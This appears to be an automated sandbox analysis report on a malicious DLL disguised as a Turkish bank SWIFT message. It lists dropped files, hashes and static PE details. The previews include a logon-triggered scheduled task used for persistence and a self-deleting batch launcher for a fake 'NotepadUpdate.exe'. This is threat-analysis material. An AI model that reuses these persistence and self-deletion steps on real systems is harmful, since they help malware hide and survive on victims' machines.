                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_seyifs2l.ql5.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yacg2uye.2gg.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\tmp18B1.tmp

                                Download File
                                Process:C:\Users\user\AppData\Roaming\regasms.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1608
                                Entropy (8bit):5.125848026435071
                                Encrypted:false
                                SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtnxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTxv
                                MD5:325596BA2EC0373F7130E87DB9338492
                                SHA1:5B63F260C4100E68BD1E51775502FD664684D464
                                SHA-256:FF82AF4D9B5188729A552EE381D4DD815D4D56C090970B6A15D5AA14F9D417AE
                                SHA-512:2C6A2101A656ABBF931351514899A80BE7574F4A093C7B21C8ACC41791C93E1DADAF34016CB4C190FF2E4CC7D44E576F4027D14B74A86A85C76B240BF12DD02E
                                Malicious:true
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

                                C:\Users\user\AppData\Local\Temp\tmp2042.tmp

                                Download File
                                Process:C:\Users\user\AppData\Roaming\regasms.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1608
                                Entropy (8bit):5.125848026435071
                                Encrypted:false
                                SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtnxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTxv
                                MD5:325596BA2EC0373F7130E87DB9338492
                                SHA1:5B63F260C4100E68BD1E51775502FD664684D464
                                SHA-256:FF82AF4D9B5188729A552EE381D4DD815D4D56C090970B6A15D5AA14F9D417AE
                                SHA-512:2C6A2101A656ABBF931351514899A80BE7574F4A093C7B21C8ACC41791C93E1DADAF34016CB4C190FF2E4CC7D44E576F4027D14B74A86A85C76B240BF12DD02E
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

                                C:\Users\user\AppData\Local\Temp\tmp9EF.tmp

                                Download File
                                Process:C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1608
                                Entropy (8bit):5.125848026435071
                                Encrypted:false
                                SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtnxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTxv
                                MD5:325596BA2EC0373F7130E87DB9338492
                                SHA1:5B63F260C4100E68BD1E51775502FD664684D464
                                SHA-256:FF82AF4D9B5188729A552EE381D4DD815D4D56C090970B6A15D5AA14F9D417AE
                                SHA-512:2C6A2101A656ABBF931351514899A80BE7574F4A093C7B21C8ACC41791C93E1DADAF34016CB4C190FF2E4CC7D44E576F4027D14B74A86A85C76B240BF12DD02E
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

                                C:\Users\user\AppData\Local\Temp\tmpD9E2.tmp.bat

                                Download File
                                Process:C:\Users\user\AppData\Roaming\regasms.exe
                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):165
                                Entropy (8bit):5.026708567071967
                                Encrypted:false
                                SSDEEP:3:mKDDCMNqTtvL5o0nacwREaKC5eiBNJovmqRD0nacwRE2J5xAInTRILxLRW1ZPy:hWKqTtT6cNwiaZ5eOovmq1cNwi23fT4N
                                MD5:FEA34DBD27BFB9695B22FA8CD40BB1B4
                                SHA1:FAE60C96B2026D26A5E5046AA0E8FCD893533643
                                SHA-256:0726EAF7358ABA61C2755A01542D5EA9B2611992D9B4FC986785C535D0EEC9CA
                                SHA-512:61CE8A3B8075EB414E2D840C23C36D5B2A2A8528B26A68A9D9C55703EF6F6B5C5DC1E2A6871B026D4288CB29947B4AC337A8D0EEE4894064796C79DF7A8E37FD
                                Malicious:false
                                Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\NotepadUpdate.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpD9E2.tmp.bat" /f /q..

                                C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe

                                Download File
                                Process:C:\Users\user\AppData\Roaming\regasms.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):670216
                                Entropy (8bit):7.434728031470088
                                Encrypted:false
                                SSDEEP:12288:77MfJIBvlbmLC3sCPtRzSXiBdja/z2UmG5pc4M1xK/5BFz2430RUwy9EXX+CNkkR:SIme3LLAiBdMmGpNkspz2i0RUwFOCND
                                MD5:AE806B6F5E02484C2BE2B49DA35B3D26
                                SHA1:66AE8DF94CD9E804FAB01BC6BE77CFEC8D544226
                                SHA-256:7A31E73A61251309C51A343C14AF5149915110C0F818747F7DE78344739F21C5
                                SHA-512:8EA9CFE94BC4DBFC0A6C43B811461E6DA4CAB55FE6A3DDD1A4795F0887B2A311A6E9D9A464BB9253985C5A68CC206C36A703319463E5DACA92ADBE056E16A968
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 26%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....N...............0.................. ... ....@.. .......................`............@.....................................O.... ..\................6...@..........p............................................ ............... ..H............text...4.... ...................... ..`.rsrc...\.... ......................@..@.reloc.......@......................@..B........................H...........Th......f...<A................................................r...ps....}.....s....}......}.....(.......(......(.....*...0..............{....o....o......r{..p.{....s....}.....{....o.......{....o....}....+N...X..{....o..........%...?....%..{.....o....o.....%..{.....o....o.....o....&..{....o......-..{....o .....{....o!....*..0............{....o"....o#...o$...o%.....r...p(&.....9.....s......{.....{....o.....o'...o(...o)....o*...o+...o....o,.....{....r...p.{....o.....

                                C:\Users\user\AppData\Roaming\MyData\DataLogs.conf

                                Download File
                                Process:C:\Users\user\AppData\Roaming\regasms.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):8
                                Entropy (8bit):2.75
                                Encrypted:false
                                SSDEEP:3:Rt:v
                                MD5:CF759E4C5F14FE3EEC41B87ED756CEA8
                                SHA1:C27C796BB3C2FAC929359563676F4BA1FFADA1F5
                                SHA-256:C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761
                                SHA-512:C7F832AEE13A5EB36D145F35D4464374A9E12FA2017F3C2257442D67483B35A55ECCAE7F7729243350125B37033E075EFBC2303839FD86B81B9B4DCA3626953B
                                Malicious:false
                                Preview:.5.False

                                C:\Users\user\AppData\Roaming\NotepadUpdate.exe

                                Download File
                                Process:C:\Users\user\AppData\Roaming\regasms.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):670216
                                Entropy (8bit):7.434728031470088
                                Encrypted:false
                                SSDEEP:12288:77MfJIBvlbmLC3sCPtRzSXiBdja/z2UmG5pc4M1xK/5BFz2430RUwy9EXX+CNkkR:SIme3LLAiBdMmGpNkspz2i0RUwFOCND
                                MD5:AE806B6F5E02484C2BE2B49DA35B3D26
                                SHA1:66AE8DF94CD9E804FAB01BC6BE77CFEC8D544226
                                SHA-256:7A31E73A61251309C51A343C14AF5149915110C0F818747F7DE78344739F21C5
                                SHA-512:8EA9CFE94BC4DBFC0A6C43B811461E6DA4CAB55FE6A3DDD1A4795F0887B2A311A6E9D9A464BB9253985C5A68CC206C36A703319463E5DACA92ADBE056E16A968
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 26%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....N...............0.................. ... ....@.. .......................`............@.....................................O.... ..\................6...@..........p............................................ ............... ..H............text...4.... ...................... ..`.rsrc...\.... ......................@..@.reloc.......@......................@..B........................H...........Th......f...<A................................................r...ps....}.....s....}......}.....(.......(......(.....*...0..............{....o....o......r{..p.{....s....}.....{....o.......{....o....}....+N...X..{....o..........%...?....%..{.....o....o.....%..{.....o....o.....o....&..{....o......-..{....o .....{....o!....*..0............{....o"....o#...o$...o%.....r...p(&.....9.....s......{.....{....o.....o'...o(...o)....o*...o+...o....o,.....{....r...p.{....o.....

                                C:\Users\user\AppData\Roaming\regasms.exe

                                Download File
                                Process:C:\Windows\System32\rundll32.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):670216
                                Entropy (8bit):7.434728031470088
                                Encrypted:false
                                SSDEEP:12288:77MfJIBvlbmLC3sCPtRzSXiBdja/z2UmG5pc4M1xK/5BFz2430RUwy9EXX+CNkkR:SIme3LLAiBdMmGpNkspz2i0RUwFOCND
                                MD5:AE806B6F5E02484C2BE2B49DA35B3D26
                                SHA1:66AE8DF94CD9E804FAB01BC6BE77CFEC8D544226
                                SHA-256:7A31E73A61251309C51A343C14AF5149915110C0F818747F7DE78344739F21C5
                                SHA-512:8EA9CFE94BC4DBFC0A6C43B811461E6DA4CAB55FE6A3DDD1A4795F0887B2A311A6E9D9A464BB9253985C5A68CC206C36A703319463E5DACA92ADBE056E16A968
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 26%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....N...............0.................. ... ....@.. .......................`............@.....................................O.... ..\................6...@..........p............................................ ............... ..H............text...4.... ...................... ..`.rsrc...\.... ......................@..@.reloc.......@......................@..B........................H...........Th......f...<A................................................r...ps....}.....s....}......}.....(.......(......(.....*...0..............{....o....o......r{..p.{....s....}.....{....o.......{....o....}....+N...X..{....o..........%...?....%..{.....o....o.....%..{.....o....o.....o....&..{....o......-..{....o .....{....o!....*..0............{....o"....o#...o$...o%.....r...p(&.....9.....s......{.....{....o.....o'...o(...o)....o*...o+...o....o,.....{....r...p.{....o.....

                                \Device\Null

                                Download File
                                Process:C:\Windows\SysWOW64\timeout.exe
                                File Type:ASCII text, with CRLF line terminators, with overstriking
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.41440934524794
                                Encrypted:false
                                SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                MD5:3DD7DD37C304E70A7316FE43B69F421F
                                SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                Malicious:false
                                Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..

                                Static File Info

                                General

                                File type:MS-DOS executable PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                Entropy (8bit):5.587424394573565
                                TrID:
                                • Win64 Dynamic Link Library (generic) (102004/3) 86.39%
                                • Win64 Executable (generic) (12005/4) 10.17%
                                • Generic Win/DOS Executable (2004/3) 1.70%
                                • DOS Executable Generic (2002/1) 1.70%
                                • VXD Driver (31/22) 0.03%
                                File name:Ziraat Bankasi Swift Mesaji.dqy.dll
                                File size:113'152 bytes
                                MD5:d8debe62cb0e2fee8f1d740ba963cc71
                                SHA1:c1e39bee02a0a141d852921ccd2f0054b8458c58
                                SHA256:f95616ad77ada13b28ccb8cb4627c8f9af26c0bf46470da06e5c109a58ee8492
                                SHA512:5abb0966ad7ade1e9922f20332daf047e60fe2c1529bffa61cc6fbb1e7562d4dc35d3206a6aecc91f8c2a44e66a8dea018cd9043528e87060a2d99862154ab29
                                SSDEEP:1536:9kxzCj2eJKH6lBqJDP4zxdY1jl7LFs9dpZ9KED8miPmJZZT:9kxGSrIQJDoxdgLFAdp1fR
                                TLSH:B9B3E1953B80F4E7DB19027A72A4ED66BEF631B2803749793B40621FD9F17625234F01
                                File Content Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode...$........PE..d.;...Wg........... ...I............Z........./.....................................W.....@................................

                                File Icon

                                Icon Hash:7ae282899bbab082

                                Static PE Info

                                General

                                Entrypoint:0xe2f135a
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0xe2f0000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DLL
                                DLL Characteristics:DYNAMIC_BASE
                                Time Stamp:0x6757D584 [Tue Dec 10 05:45:40 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:1
                                OS Version Minor:0
                                File Version Major:1
                                File Version Minor:0
                                Subsystem Version Major:1
                                Subsystem Version Minor:0
                                Import Hash:bbd194bfff736fca6517da790c3a91f9

                                Entrypoint Preview

                                Instruction
                                dec eax
                                mov eax, 00000001h
                                ret
                                dec eax
                                sub esp, 00001418h
                                call 00007F422CB5F677h
                                imul eax, dword ptr [eax], 65h
                                add byte ptr [edx+00h], dh
                                outsb
                                add byte ptr [ebp+00h], ah
                                insb
                                add byte ptr [ebx], dh
                                add byte ptr [edx], dh
                                add byte ptr [eax], al
                                add byte ptr [ecx-18h], bl
                                jnle 00007F422CB5F666h
                                add byte ptr [eax], al
                                dec eax
                                mov ebx, eax
                                call 00007F422CB5F672h
                                dec esp
                                outsd
                                popad
                                dec esp
                                imul esp, dword ptr [edx+72h], 57797261h
                                add byte ptr [edx+48h], bl
                                mov ecx, ebx
                                call 00007F422CB5FB42h
                                dec ecx
                                mov edi, eax
                                call 00007F422CB5F674h
                                inc edi
                                je 00007F422CB5F6B3h
                                jc 00007F422CB5F6D1h
                                arpl word ptr [ecx+64h], ax
                                jc 00007F422CB5F6C8h
                                jnc 00007F422CB5F6D5h
                                add byte ptr [edx+48h], bl
                                mov ecx, ebx
                                call 00007F422CB5FB22h
                                dec eax
                                mov esi, eax
                                call 00007F422CB5F67Fh
                                inc ebp
                                js 00007F422CB5F6D2h
                                popad
                                outsb
                                inc ebp
                                outsb
                                jbe 00007F422CB5F6CBh
                                jc 00007F422CB5F6D1h
                                outsb
                                insd
                                outsb
                                je 00007F422CB5F6B5h
                                je 00007F422CB5F6D4h
                                imul ebp, dword ptr [esi+67h], 5A005773h
                                dec eax
                                mov ecx, ebx
                                call esi
                                dec ecx
                                mov eax, 00000104h
                                dec eax
                                lea edx, dword ptr [esp+74h]
                                call 00007F422CB5F691h
                                and eax, 50004100h
                                add byte ptr [eax+00h], dl
                                inc esp
                                add byte ptr [ecx+00h], al
                                push esp
                                add byte ptr [ecx+00h], al
                                and eax, 72005C00h
                                add byte ptr [ebp+00h], ah
                                add byte ptr [bx+di+00h], ah
                                jnc 00007F422CB5F662h
                                insd
                                add byte ptr [ebx+00h], dh
                                add byte ptr [ebp+00h], ah

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x3a0000x43.edata
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x10000xafb.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x3b0000x8.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000xafb0xa00da0c0d8d501f646cc8d6096db3634386False0.487890625data4.71087358252814IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .data0x20000x2000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                BVOtlE0x30000x10000x10006f55f88b76d028233d27a81335c1998dFalse0.773681640625data6.779050023884054IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                TZlC0x40000x2000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                Nz0x50000x10000x1000321f5c147a553950f4a8c84cc32d4deeFalse0.23583984375OpenPGP Secret Key2.4607384716293943IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                O0x60000x2000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                VkmH8y10x70000x10000x10004edfc21db5c9411032ceae22b176542dFalse0.8701171875data6.993962551079028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                wN0x80000x2000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                F7SI0x90000x10000x1000321f5c147a553950f4a8c84cc32d4deeFalse0.23583984375OpenPGP Secret Key2.4607384716293943IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                E6qQ0xa0000x10000x1000581e084be9c4bf90a1e21cae3245e74cFalse0.505615234375data4.891775390323811IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                Lr0xb0000x2000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                AN0xc0000x2000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                f0xd0000x10000x100098020a5057aa6be2eaea3b630a7955c5False0.603515625data5.555156233918424IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                5P0fnl0xe0000x2000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                V0xf0000x10000x100086f07bb8988c71f5fe4cef95e03e2289False0.82470703125data6.9371450090585824IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                OwHk0x100000x2000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                6Hmqv0x110000x2000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                APW0x120000x2000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                ZLm0x130000x2000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                08bnu0x140000x2000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                cnEkflK0x150000x2000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                J0x160000x10000x1000b66245f88a0f0216f463eaa335558c18False0.472900390625data4.560959503733109IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                xym0og0x170000x10000x1000ba0ecb6e60e54e49729d63b76228b1b9False0.028564453125data0.23771294614484934IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                500x180000x2000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                40x190000x10000x1000a9144a5633e52e6b0fe287361f1d078eFalse0.556884765625data5.262900284027848IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                LQ1yM4J0x1a0000x10000x1000626c018f71e42377a4ea9fa818a19449False0.266845703125data2.8377178780633447IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                cMmi0x1b0000x2000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                2c7K0x1c0000x2000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                MB0x1d0000x10000x1000cf400c1cb4f0509535301a713deed085False0.5078125data4.77069666119663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                WRrW0x1e0000x10000x100016cd76339c79c89f135eb65ec2a44c8bFalse0.53759765625data5.34732208523925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
